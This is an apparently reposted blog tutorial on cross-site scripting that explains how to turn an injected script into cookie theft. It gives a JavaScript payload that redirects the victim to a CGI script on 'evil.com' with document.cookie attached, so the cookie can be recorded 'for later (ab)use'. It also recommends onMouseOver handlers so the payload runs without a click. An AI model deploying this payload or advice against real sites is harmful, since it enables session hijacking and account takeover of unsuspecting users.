Cross site script

最新推荐文章于 2024-01-24 20:01:30 发布

fiba66

最新推荐文章于 2024-01-24 20:01:30 发布

阅读量988

点赞数

分类专栏： Programmer's Life 文章标签： redirect user website cgi

Programmer's Life 专栏收录该内容

12 篇文章 0 订阅

订阅专栏

http://www.steve.org.uk/Hacks/XSS/

I can run script, what now?

You've seen how you can enter script into a page and have it run when a user clicks on a link, or views a page.

This is really just a proof of concept, you don't want to have people viewing the popup boxes all day!

So .. you want to do something more useful?

Redirection

One common technique is to redirect the user to a different website which you control. This would allow you to record the users cookie for later (ab)use.

The way I've done this in the past is to use code like this:
<script>
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;
</script>
This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.

The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'. This could be recorded for use later.

Other Tips

Using the onClick handler you have to rely upon the user clicking on a link you have placed.

You do run the risk that the user will not click it, so what then?

You can use another method onMouseOver, this allows you to have code executed when the mouse pointer merely moves over a link.

An other article:http://ha.ckers.org/xss.html
http://www.informit.com/articles/article.asp?p=603037&rl=1